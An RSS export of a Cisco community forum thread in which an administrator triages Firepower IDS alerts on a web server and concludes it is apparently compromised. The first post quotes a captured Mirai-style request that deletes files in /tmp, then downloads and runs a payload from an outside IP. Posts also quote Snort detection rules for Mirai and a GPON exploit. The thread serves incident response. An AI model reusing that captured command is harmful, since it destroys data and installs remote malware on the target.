<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:taxo="http://purl.org/rss/1.0/modules/taxonomy/" version="2.0">
  <channel>
    <title>topic Re: IPS Event - how to know if it's just a drive by or a compromise in Network Security</title>
    <link>https://community.cisco.com/t5/network-security/ips-event-how-to-know-if-it-s-just-a-drive-by-or-a-compromise/m-p/4597118#M1089405</link>
    <description>&lt;P&gt;Hi&lt;/P&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;Is your IPS configured with drop inline checkbox enabled? what ips level you have configured?&lt;/P&gt;
&lt;P&gt;If so, this traffic is normally dropped.&amp;nbsp;&lt;BR /&gt;&lt;BR /&gt;&lt;BR /&gt;&lt;/P&gt;
&lt;P&gt;if IPS isn’t dope then I’ll investigate more on this server to make sure it’s not compromised.&amp;nbsp;&lt;BR /&gt;&lt;BR /&gt;&lt;/P&gt;
&lt;P&gt;thanks&lt;/P&gt;</description>
    <pubDate>Fri, 22 Apr 2022 02:53:46 GMT</pubDate>
    <dc:creator>Francesco Molino</dc:creator>
    <dc:date>2022-04-22T02:53:46Z</dc:date>
    <item>
      <title>IPS Event - how to know if it's just a drive by or a compromise</title>
      <link>https://community.cisco.com/t5/network-security/ips-event-how-to-know-if-it-s-just-a-drive-by-or-a-compromise/m-p/4597063#M1089398</link>
      <description>&lt;P&gt;Hello. I just setup IDS for the first time in Cisco firepower. I'm not ready to implement IPS in my environment. I have a couple of high priority events so far. I want to look at a specific one and get some input on whether or not I actually have a trojan inside my network, or if it's more of just a drive by attempt to access the network. I have a web server accessible with port 80 and 443. Here's the event info without my specific info:&lt;/P&gt;&lt;P&gt;&amp;nbsp;&lt;/P&gt;&lt;P&gt;Event MALWARE-CNC User-Agent known malicious user-agent string - Mirai (1:58992:1)&lt;BR /&gt;Timestamp 2022-04-21 14:08:10&lt;BR /&gt;Classification A Network Trojan was Detected&lt;BR /&gt;Priority high&lt;BR /&gt;Ingress Security Zone Outside&lt;BR /&gt;Egress Security Zone DMZ-BUS&lt;BR /&gt;Device &amp;lt;Firewall name&amp;gt;&lt;BR /&gt;Ingress Interface Lumen&lt;BR /&gt;Egress Interface DMZ-BUS&lt;BR /&gt;Source IP 156.218.101.54&lt;BR /&gt;Source Port / ICMP Type 44371 / tcp&lt;BR /&gt;Source Country EgyptEGY&lt;BR /&gt;Destination IP &amp;lt;Internal device IP&amp;gt;&lt;BR /&gt;Destination Port / ICMP Code 80 (http) / tcp&lt;BR /&gt;Intrusion Policy &amp;lt;intrusion policy name&amp;gt;&lt;BR /&gt;Access Control Policy &amp;lt;access control policy name&amp;gt;&lt;BR /&gt;Access Control Rule WebTraffic-In-APPS&lt;BR /&gt;Rule alert tcp $HOME_NET any -&amp;gt; $EXTERNAL_NET $HTTP_PORTS (msg:"MALWARE-CNC User-Agent known malicious user-agent string - Mirai"; flow:to_server,established; content:"User-Agent|3A| Hello, world"; fast_pattern:only; http_header; metadata:impact_flag red, policy balanced-ips drop, policy max-detect-ips drop, policy security-ips drop, service http; reference:url,&lt;A href="http://www.virustotal.com/en/file/3908cc1d8001f926031fbe55ce104448dbc20c9795b7c3cfbd9abe7b789f899d/analysis/" target="_blank"&gt;www.virustotal.com/en/file/3908cc1d8001f926031fbe55ce104448dbc20c9795b7c3cfbd9abe7b789f899d/analysis/&lt;/A&gt;; classtype:trojan-activity; sid:58992; rev:1; gid:1; )&lt;/P&gt;&lt;P&gt;&amp;nbsp;&lt;/P&gt;&lt;P&gt;Packet Text&lt;BR /&gt;...w.m.d@G.B..E... .@.6.T...e6?....S.P&lt;BR /&gt;^..Og..P..X....GET /shell?cd+/tmp;rm+-rf+*;wget+23.94.50.159/jaws;sh+/tmp/jaws HTTP/1.1&lt;BR /&gt;User-Agent: Hello, world&lt;BR /&gt;Host: 127.0.0.1:80&lt;BR /&gt;Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8&lt;BR /&gt;Connection: keep-alive&lt;/P&gt;</description>
      <pubDate>Thu, 21 Apr 2022 22:54:53 GMT</pubDate>
      <guid>https://community.cisco.com/t5/network-security/ips-event-how-to-know-if-it-s-just-a-drive-by-or-a-compromise/m-p/4597063#M1089398</guid>
      <dc:creator>sanchezeldorado</dc:creator>
      <dc:date>2022-04-21T22:54:53Z</dc:date>
    </item>
    <item>
      <title>Re: IPS Event - how to know if it's just a drive by or a compromise</title>
      <link>https://community.cisco.com/t5/network-security/ips-event-how-to-know-if-it-s-just-a-drive-by-or-a-compromise/m-p/4597118#M1089405</link>
      <description>&lt;P&gt;Hi&lt;/P&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;Is your IPS configured with drop inline checkbox enabled? what ips level you have configured?&lt;/P&gt;
&lt;P&gt;If so, this traffic is normally dropped.&amp;nbsp;&lt;BR /&gt;&lt;BR /&gt;&lt;BR /&gt;&lt;/P&gt;
&lt;P&gt;if IPS isn’t dope then I’ll investigate more on this server to make sure it’s not compromised.&amp;nbsp;&lt;BR /&gt;&lt;BR /&gt;&lt;/P&gt;
&lt;P&gt;thanks&lt;/P&gt;</description>
      <pubDate>Fri, 22 Apr 2022 02:53:46 GMT</pubDate>
      <guid>https://community.cisco.com/t5/network-security/ips-event-how-to-know-if-it-s-just-a-drive-by-or-a-compromise/m-p/4597118#M1089405</guid>
      <dc:creator>Francesco Molino</dc:creator>
      <dc:date>2022-04-22T02:53:46Z</dc:date>
    </item>
    <item>
      <title>Re: IPS Event - how to know if it's just a drive by or a compromise</title>
      <link>https://community.cisco.com/t5/network-security/ips-event-how-to-know-if-it-s-just-a-drive-by-or-a-compromise/m-p/4597127#M1089406</link>
      <description>&lt;P&gt;Hello. At the time, i didn't have approval to drop traffic, but I have now checked the drop inline checkbox. I haven't gotten any more intrusion events blocked or otherwise since, but I think it likely that they just switched to HTTPS, and I don't have SSL decryption enabled. I know HOW to block these threats. With both security intelligence and with ssl decryption, but my client is very hesitant to add these to their 24/7 network. They've had bad experiences in the past. My main concern is whether or not a host inside the network is already compromised. Since my initial post, I did get another event that makes me pretty sure I'm compromised because it was initiated from inside the network at the exact same time as a CnC event with the same IP.&amp;nbsp;&lt;BR /&gt;&lt;BR /&gt;Event MALWARE-OTHER GPON exploit download attempt (1:46840:1)&lt;BR /&gt;Timestamp 2022-04-21 19:01:01&lt;BR /&gt;Classification A Network Trojan was Detected&lt;BR /&gt;Priority high&lt;BR /&gt;Ingress Security Zone DMZ-BUS&lt;BR /&gt;Egress Security Zone Outside&lt;BR /&gt;Device &amp;lt;FW name&amp;gt;&lt;BR /&gt;Ingress Interface DMZ-BUS&lt;BR /&gt;Egress Interface Lumen&lt;BR /&gt;Source IP &amp;lt;Web server IP&amp;gt;&lt;BR /&gt;Source Port / ICMP Type 80 (http) / tcp&lt;BR /&gt;Destination IP 116.75.242.18&lt;BR /&gt;Destination Port / ICMP Code 60930 / tcp&lt;BR /&gt;Destination Country India IND&lt;BR /&gt;Intrusion Policy &amp;lt;Intrusion policy&amp;gt;&lt;BR /&gt;Access Control Policy &amp;lt;ACP&amp;gt;&lt;BR /&gt;Access Control Rule WebTraffic-In-APPS&lt;BR /&gt;Rule alert tcp $EXTERNAL_NET $FILE_DATA_PORTS -&amp;gt; $HOME_NET any (msg:"MALWARE-OTHER GPON exploit download attempt"; flow:to_client,established; file_data; content:"/GponForm/diag_Form?images/"; fast_pattern:only; metadata:impact_flag red, policy balanced-ips drop, policy max-detect-ips drop, policy security-ips drop, service ftp-data, service http, service imap, service pop3; reference:cve,2018-10561; reference:url,vpnmentor.com/blog/critical-vulnerability-gpon-router/; classtype:trojan-activity; sid:46840; rev:1; gid:1;&lt;/P&gt;</description>
      <pubDate>Fri, 22 Apr 2022 03:16:15 GMT</pubDate>
      <guid>https://community.cisco.com/t5/network-security/ips-event-how-to-know-if-it-s-just-a-drive-by-or-a-compromise/m-p/4597127#M1089406</guid>
      <dc:creator>sanchezeldorado</dc:creator>
      <dc:date>2022-04-22T03:16:15Z</dc:date>
    </item>
    <item>
      <title>Re: IPS Event - how to know if it's just a drive by or a compromise</title>
      <link>https://community.cisco.com/t5/network-security/ips-event-how-to-know-if-it-s-just-a-drive-by-or-a-compromise/m-p/4598251#M1089459</link>
      <description>&lt;P&gt;I'll consider this closed. A lot more digging and many other results suggest it is compromised.&amp;nbsp;&lt;/P&gt;</description>
      <pubDate>Sat, 23 Apr 2022 08:40:18 GMT</pubDate>
      <guid>https://community.cisco.com/t5/network-security/ips-event-how-to-know-if-it-s-just-a-drive-by-or-a-compromise/m-p/4598251#M1089459</guid>
      <dc:creator>sanchezeldorado</dc:creator>
      <dc:date>2022-04-23T08:40:18Z</dc:date>
    </item>
  </channel>
</rss>

